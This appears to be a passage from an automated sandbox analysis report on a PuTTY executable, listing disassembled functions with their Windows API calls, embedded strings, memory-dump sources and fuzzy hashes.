                            • API ID:
                            • String ID: Internal networking trouble
                            • API String ID: 0-3700075771
                            • Opcode ID: 8aca131887f23cb177e2a64b7159aa016e20f2b7d6c4eb67819064fa45d3ced9
                            • Instruction ID: 75c08d8d098d834a88a36c3cf5356de64fa8c3ee3eb6a55600d215e6dd627134
                            • Opcode Fuzzy Hash: 8aca131887f23cb177e2a64b7159aa016e20f2b7d6c4eb67819064fa45d3ced9
                            • Instruction Fuzzy Hash: ED910471504110AFEF209F64CC8997F7BA9EF04355B2545ABF909CA246DB38CC82CBA9
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00445DAD Relevance: 19.5, APIs: 6, Strings: 5, Instructions: 215comCOMMON
                            Download Yara Rule
                            APIs
                            • GetModuleFileNameA.KERNEL32(00000000,004761A8,000007FF), ref: 00445DCC
                            • _strrchr.LIBCMT ref: 00445DDE
                            • _strrchr.LIBCMT ref: 00445DEF
                            • CoCreateInstance.OLE32(0046C8C4,00000000,00000001,0046C8F4,?), ref: 00445E64
                              • Part of subcall function 0044974C: _strlen.LIBCMT ref: 00449766
                              • Part of subcall function 0044974C: RegOpenKeyA.ADVAPI32(80000001,Software\SimonTatham\PuTTY\Sessions,?), ref: 00449797
                            • _strcspn.LIBCMT ref: 00445F05
                            • _strcspn.LIBCMT ref: 00445F99
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: _strcspn_strrchr$CreateFileInstanceModuleNameOpen_strlen
                            • String ID: %.*s%s$..\windows\winjump.c$Connect to PuTTY session '$Run %.*s$appname
                            • API String ID: 3346247394-3778623159
                            • Opcode ID: 0f5824e23baeb7c20c4420b20658211f8af3458171e97ec44b077a01e7f430b8
                            • Instruction ID: 4e1149513c1cddde36fdb35d419dcc4211a9bcca3a3b657898fa7c3de4ae22ad
                            • Opcode Fuzzy Hash: 0f5824e23baeb7c20c4420b20658211f8af3458171e97ec44b077a01e7f430b8
                            • Instruction Fuzzy Hash: 6C61A871904204BFEF10AFA5DC86DAE7B68EF44358F20446BF404A7192DB799E05C79E
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0043D83C Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 121windowCOMMON
                            Download Yara Rule
                            APIs
                            • CreatePopupMenu.USER32 ref: 0043D877
                            • AppendMenuA.USER32(00000000,00000800,00000000,00000000), ref: 0043D922
                            • DeleteMenu.USER32(00474DCC,00000000,00000000,?,00000000,?,?,00000000,00000000,?), ref: 0043D968
                            • DeleteMenu.USER32(00474DCC,00000200,00000000,?,?,00000000,00000000,?), ref: 0043D977
                            • InsertMenuA.USER32(00000000,00000010,00000010,00000000,S&pecial Command), ref: 0043D991
                            • InsertMenuA.USER32(00000000,00000010,00000800,00000200,00000000), ref: 0043D9A7
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: Menu$DeleteInsert$AppendCreatePopup
                            • String ID: ..\windows\window.c$IDM_SPECIAL_MIN + 0x10 * i < IDM_SPECIAL_MAX$S&pecial Command$nesting < 2
                            • API String ID: 1803796953-3117707344
                            • Opcode ID: 50985c5cdb6338a61484ed805499b038a35a8630363a0cf14e111ecf80a9f798
                            • Instruction ID: f716ba6e74fcb05d6137015d9dc48625a53a0921aef2e9370a1c0a39c38b803b
                            • Opcode Fuzzy Hash: 50985c5cdb6338a61484ed805499b038a35a8630363a0cf14e111ecf80a9f798
                            • Instruction Fuzzy Hash: 60410470A04305AFD720DF14EC45F2677A5FF88B00F11043EF659962A1D7B5A858DB9E
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00440339 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 82windowCOMMON
                            Download Yara Rule
                            APIs
                            • GetTickCount.KERNEL32 ref: 0044034F
                            • MessageBeep.USER32(00000000), ref: 00440364
                            • GetTickCount.KERNEL32 ref: 0044036A
                            • PlaySoundA.WINMM(00000000,00000000,00020001), ref: 00440396
                            • MessageBoxA.USER32(?,?,00000030), ref: 004403E1
                            • GetTickCount.KERNEL32 ref: 00440407
                            • Beep.KERNEL32(00000320,00000064), ref: 00440426
                            • MessageBeep.USER32(000000FF), ref: 00440430
                            • GetTickCount.KERNEL32 ref: 00440436
                            Strings
                            • Unable to play sound file%sUsing default sound instead, xrefs: 004403A9
                            • %.70s Sound Error, xrefs: 004403C0
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: CountTick$BeepMessage$PlaySound
                            • String ID: %.70s Sound Error$Unable to play sound file%sUsing default sound instead
                            • API String ID: 1693037769-2062101151
                            • Opcode ID: fc171fb02cd39a5d714f7c9e0f92fa6d51ac409d368c6c5cd9b13834fb9f7725
                            • Instruction ID: 7898eadf5f8e9ad27b4d3061a56f7eab077a7d8e983b090a55d27307dbe37007
                            • Opcode Fuzzy Hash: fc171fb02cd39a5d714f7c9e0f92fa6d51ac409d368c6c5cd9b13834fb9f7725
                            • Instruction Fuzzy Hash: CB218231944304EBEB209F64FD4AB593B69EB00719F508077F704A60F2DA79A9A4CF5A
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00448879 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 67libraryloaderCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcAddress.KERNEL32(00000000,GetSecurityInfo), ref: 004488A1
                            • GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 004488BF
                            • GetProcAddress.KERNEL32(00000000,GetTokenInformation), ref: 004488E5
                            • GetProcAddress.KERNEL32(00000000,InitializeSecurityDescriptor), ref: 0044890B
                            • GetProcAddress.KERNEL32(00000000,SetSecurityDescriptorOwner), ref: 00448931
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: AddressProc
                            • String ID: GetSecurityInfo$GetTokenInformation$InitializeSecurityDescriptor$OpenProcessToken$SetSecurityDescriptorOwner$advapi32.dll
                            • API String ID: 190572456-1280498236
                            • Opcode ID: 147404f718c38340a52a9cfb238b8301b1f628c3ea244f458a9c3803dc355b30
                            • Instruction ID: e69762124b79aaea25ebe3cc4b322c2f4d21d8f10d78ee421258ab8e9858e140
                            • Opcode Fuzzy Hash: 147404f718c38340a52a9cfb238b8301b1f628c3ea244f458a9c3803dc355b30
                            • Instruction Fuzzy Hash: 3C1149B0E0C780DE96A19F69AC4193B76E5B6447507A5053FE00CD2264EE7898C18B2F
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00444FF9 Relevance: 19.3, APIs: 1, Strings: 10, Instructions: 59COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            • The Local Security Authority cannot be contacted., xrefs: 00445047
                            • One or more of the SecBufferDesc structures passed as an OUT parameter has a buffer that is too small., xrefs: 00445039
                            • No credentials are available in the security package., xrefs: 00445078
                            • No authority could be contacted for authentication.The domain name of the authenticating party could be wrong, the domain could be unreachable, or there might have been a trust relationship failure., xrefs: 00445071
                            • The error is due to a malformed input token, such as a token corrupted in transit, a token of incorrect size, or a token passed into the wrong security package. Passing a token to the wrong package can happen if client and server did not negotiate the proper s, xrefs: 00445086, 0044508C
                            • SSPI status OK, xrefs: 00445040
                            • The handle passed to the function is invalid., xrefs: 00445032
                            • Internal SSPI error, xrefs: 0044506A
                            • The logon failed., xrefs: 0044507F
                            • The target was not recognized., xrefs: 0044502B
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: _strlen
                            • String ID: Internal SSPI error$No authority could be contacted for authentication.The domain name of the authenticating party could be wrong, the domain could be unreachable, or there might have been a trust relationship failure.$No credentials are available in the security package.$One or more of the SecBufferDesc structures passed as an OUT parameter has a buffer that is too small.$SSPI status OK$The Local Security Authority cannot be contacted.$The error is due to a malformed input token, such as a token corrupted in transit, a token of incorrect size, or a token passed into the wrong security package. Passing a token to the wrong package can happen if client and server did not negotiate the proper s$The handle passed to the function is invalid.$The logon failed.$The target was not recognized.
                            • API String ID: 4218353326-3912637527
                            • Opcode ID: f3cdb7d9c93b13640cfff6bbf4dd655a9b9d4732e6c3df7f052bf379198df9c1
                            • Instruction ID: caaec0d047360d25483e2d884f05c723b6173bdc6bcf14ce21eff86758734f4a
                            • Opcode Fuzzy Hash: f3cdb7d9c93b13640cfff6bbf4dd655a9b9d4732e6c3df7f052bf379198df9c1
                            • Instruction Fuzzy Hash: C1115E28249E029FBF34895914D483B1298D700750B38C92BE4C7DB323EA1DDC82A2CF
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00441074 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 118windowCOMMON
                            Download Yara Rule
                            APIs
                            • MessageBoxA.USER32(00000000,?,00001010), ref: 004410FE
                            • MessageBoxA.USER32(00000000,?,00000010), ref: 004410AD
                              • Part of subcall function 004407DE: DeleteObject.GDI32(?), ref: 004407F9
                              • Part of subcall function 004407DE: CoUninitialize.OLE32 ref: 00440822
                            • IsZoomed.USER32 ref: 0044111F
                            • GetWindowLongA.USER32(000000F0,00000000), ref: 00441156
                              • Part of subcall function 0044C558: _strcat.LIBCMT ref: 0044C598
                              • Part of subcall function 0044C558: GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,?,?,00000002), ref: 0044C5D6
                              • Part of subcall function 0044C558: _strcat.LIBCMT ref: 0044C5EC
                              • Part of subcall function 0044C558: _strlen.LIBCMT ref: 0044C5FC
                              • Part of subcall function 0044C558: _strlen.LIBCMT ref: 0044C60D
                              • Part of subcall function 0044C558: _strncpy.LIBCMT ref: 0044C628
                              • Part of subcall function 0044C558: _strlen.LIBCMT ref: 0044C665
                              • Part of subcall function 0044C558: _strlen.LIBCMT ref: 0044C67A
                            • SetWindowLongA.USER32(000000F0,00000000), ref: 0044118E
                            • SetWindowPos.USER32(00000000,00000020,?,00000020,?,00000020), ref: 004411BD
                            • CheckMenuItem.USER32(00000000,00000180,00000008), ref: 004411D7
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: _strlen$Window$LongMessage_strcat$CheckDeleteFileItemMenuModuleNameObjectUninitializeZoomed_strncpy
                            • String ID: %.70s Fatal Error$..\windows\window.c$IsZoomed(hwnd)
                            • API String ID: 1933943531-2082414888
                            • Opcode ID: fce3dfe40c68ffd62334ac97658c6fac96cb1df66c404b75bc79ef7e9b5d18ed
                            • Instruction ID: 2de357ffd558fe43d35be5c2fc604559be3ac260902c71da26710dd846257ed8
                            • Opcode Fuzzy Hash: fce3dfe40c68ffd62334ac97658c6fac96cb1df66c404b75bc79ef7e9b5d18ed
                            • Instruction Fuzzy Hash: 1931C872844314BFEB116BA5EC06E9E3F6CEF04714F104036FA18A11A2EB75AA90C7DD
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 004411E8 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 83windowCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 004405B1: IsZoomed.USER32(00441145), ref: 004405B7
                            • IsZoomed.USER32 ref: 0044111F
                            • GetWindowLongA.USER32(000000F0,00000000), ref: 00441156
                            • SetWindowLongA.USER32(000000F0,00000000), ref: 0044118E
                            • SetWindowPos.USER32(00000000,00000020,?,00000020,?,00000020), ref: 004411BD
                            • CheckMenuItem.USER32(00000000,00000180,00000008), ref: 004411D7
                            • IsZoomed.USER32(004419AD), ref: 004411FB
                            • ShowWindow.USER32(00000003), ref: 00441227
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: Window$Zoomed$Long$CheckItemMenuShow
                            • String ID: ..\windows\window.c$IsZoomed(hwnd)
                            • API String ID: 4117804504-916244480
                            • Opcode ID: 3ec283dfc081739c2a32071f0cc6aaf619f962b93ca7e01c52f32e0b0ad0e5eb
                            • Instruction ID: f2ad5695fe1bf6f6b03ed18751ddfbf57a71519467fc076ed9d38c6c7511ecfd
                            • Opcode Fuzzy Hash: 3ec283dfc081739c2a32071f0cc6aaf619f962b93ca7e01c52f32e0b0ad0e5eb
                            • Instruction Fuzzy Hash: 3021D131548302FEFB206BA1FC0AF5A3F68EF04715F144136FA15B01F2DA74A9909A4D
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00451389 Relevance: 16.8, APIs: 11, Instructions: 299COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • LCMapStringW.KERNEL32(00000000,00000100,00470560,00000001,00000000,00000000,004705B8,00000038,00454728,00000100,00000020,00000100,?,00000100,00000000,00000001), ref: 004513B0
                            • GetLastError.KERNEL32 ref: 004513C2
                            • MultiByteToWideChar.KERNEL32(?,00000000,004549BC,?,00000000,00000000,004705B8,00000038,00454728,00000100,00000020,00000100,?,00000100,00000000,00000001), ref: 00451449
                            • MultiByteToWideChar.KERNEL32(?,00000001,004549BC,?,?,00000000), ref: 004514CA
                            • LCMapStringW.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 004514E4
                            • LCMapStringW.KERNEL32(00000000,00000000,?,00000000,?,?), ref: 0045151F
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: String$ByteCharMultiWide$ErrorLast
                            • String ID:
                            • API String ID: 1775797328-0
                            • Opcode ID: a43d89358ad8aeb206864d184156587fef644e56b484bbedb7401d2c5a464903
                            • Instruction ID: 0f9fab2180f5283e91257d1693d835265a1b2066faed6e6e93dda9ee53aa62c6
                            • Opcode Fuzzy Hash: a43d89358ad8aeb206864d184156587fef644e56b484bbedb7401d2c5a464903
                            • Instruction Fuzzy Hash: C9B16B72800209EFCF119FA5DC81AEE7BB5FF08316F14422AFD15A2262D7398D95DB58
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0044B11F Relevance: 16.0, APIs: 3, Strings: 6, Instructions: 273COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: _strlen
                            • String ID: "$"$""""$\$\\\\$\\\\
                            • API String ID: 4218353326-3638190407
                            • Opcode ID: cb5a1a88f93284883957e37ad21eed0aa82e4593c8e5a9006c1fc46deeab44d5
                            • Instruction ID: 4c63627dc264242675428a62019f5fa9301fcc115b382ca89d5a57a235029a65
                            • Opcode Fuzzy Hash: cb5a1a88f93284883957e37ad21eed0aa82e4593c8e5a9006c1fc46deeab44d5
                            • Instruction Fuzzy Hash: 6191E030A046149FEF298E59D8417BE7BE1EF45315F2440ABEC85AB381C778DD428BC8
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00456B0F Relevance: 16.0, APIs: 3, Strings: 6, Instructions: 228COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: _strcat$___shr_12
                            • String ID: 1#IND$1#INF$1#QNAN$1#SNAN$?$DVE
                            • API String ID: 1152255961-2241684345
                            • Opcode ID: c9d8e649ea83fb23fe338f750a5184fbdea9415ef6662dd88caa0f876bf846e9
                            • Instruction ID: 8d05ff337edf10f2f8c340d7a3cb319d48a4cc3e973a770f373b4c0b5bd96aa5
                            • Opcode Fuzzy Hash: c9d8e649ea83fb23fe338f750a5184fbdea9415ef6662dd88caa0f876bf846e9
                            • Instruction Fuzzy Hash: C181253190429A9EDF11CF68C8447AEBBB4AF11316F46459BDC90DB283D378960DC769
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0043DBCE Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 99windowCOMMON
                            Download Yara Rule
                            APIs
                            • GetDC.USER32 ref: 0043DBD8
                            • GetDeviceCaps.GDI32(00000000,00000026), ref: 0043DC0F
                            • CreatePalette.GDI32(00000000), ref: 0043DC5C
                            • SelectPalette.GDI32(00000000,00000000,00000000), ref: 0043DC75
                            • RealizePalette.GDI32(00000000), ref: 0043DC78
                            • GetStockObject.GDI32(0000000F), ref: 0043DC82
                            • SelectPalette.GDI32(00000000,00000000), ref: 0043DC8A
                            • ReleaseDC.USER32(00000000), ref: 0043DC93
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: Palette$Select$CapsCreateDeviceObjectRealizeReleaseStock
                            • String ID: MG
                            • API String ID: 1667595171-1230926311
                            • Opcode ID: 89a8f6134c4102484f0a11a465038c8ab4a31c12b6d0b8e327957d4f7ffbc3dc
                            • Instruction ID: 834fe70462b67766a0c93dc7cb939f6e32f49242705a7289a5784bd79bf9282f
                            • Opcode Fuzzy Hash: 89a8f6134c4102484f0a11a465038c8ab4a31c12b6d0b8e327957d4f7ffbc3dc
                            • Instruction Fuzzy Hash: A4313B719183505BE3214B39AC48B677FE5DF8A705F09907EF5858B3E2CABA4805C319
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 004474AC Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 80COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            • addr->addresses && step.curraddr < addr->naddresses, xrefs: 0044752F
                            • ..\windows\winnet.c, xrefs: 0044752A
                            • <unknown>, xrefs: 00447501
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: _strncpy$htonlinet_ntoa
                            • String ID: ..\windows\winnet.c$<unknown>$addr->addresses && step.curraddr < addr->naddresses
                            • API String ID: 3148508921-295716202
                            • Opcode ID: 2d1c96696a7e8d9b4f116b082bd65d1411f611de6a0a7fb343fa42cd2c6e19d0
                            • Instruction ID: 6b8d8acdaf2bc2b623c7f4f3772b87c72555fe1c657293fcb93496f1691a44e9
                            • Opcode Fuzzy Hash: 2d1c96696a7e8d9b4f116b082bd65d1411f611de6a0a7fb343fa42cd2c6e19d0
                            • Instruction Fuzzy Hash: 8521C771904741BFFB208F159C40E6B7B68FF85314F18855AF8045B652D379E9428BB9
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0043B9D3 Relevance: 15.8, APIs: 1, Strings: 8, Instructions: 69COMMON
                            Download Yara Rule
                            APIs
                            • SetDlgItemTextA.USER32(?,00000001,00000000), ref: 0043BA76
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: ItemText
                            • String ID: ..\windows\winctrls.c$Font: %s, %s%d-%s$Font: %s, %sdefault height$bold, $c && c->ctrl->generic.type == CTRL_FONTSELECT$gvE$pixel$point
                            • API String ID: 3367045223-3986346739
                            • Opcode ID: cb851731548ac4e033d6a3b4961245ca795a79c7986cf5070f24ade9058a65ff
                            • Instruction ID: 07d64e6c7caa35e5ab0b519a4ad7607eb4f04de528870c8fcec56afb0a3255d9
                            • Opcode Fuzzy Hash: cb851731548ac4e033d6a3b4961245ca795a79c7986cf5070f24ade9058a65ff
                            • Instruction Fuzzy Hash: FB11B672244601AFEB04BE56DC82E377759DF89715F20903FF50096252EB2D9C618B9F
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 004485CB Relevance: 15.1, APIs: 10, Instructions: 90threadtimeclipboardCOMMON
                            Download Yara Rule
                            APIs
                            • GetForegroundWindow.USER32 ref: 004485D1
                            • GetCapture.USER32 ref: 004485E7
                            • GetClipboardOwner.USER32 ref: 004485FD
                            • GetQueueStatus.USER32(000000BF), ref: 00448618
                            • GetCursorPos.USER32(?), ref: 00448632
                            • GlobalMemoryStatus.KERNEL32(?), ref: 00448649
                            • GetCurrentThread.KERNEL32 ref: 0044866C
                            • GetThreadTimes.KERNEL32(00000000), ref: 00448673
                            • GetCurrentProcess.KERNEL32(?,?,?,?), ref: 00448696
                            • GetProcessTimes.KERNEL32(00000000), ref: 0044869D
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
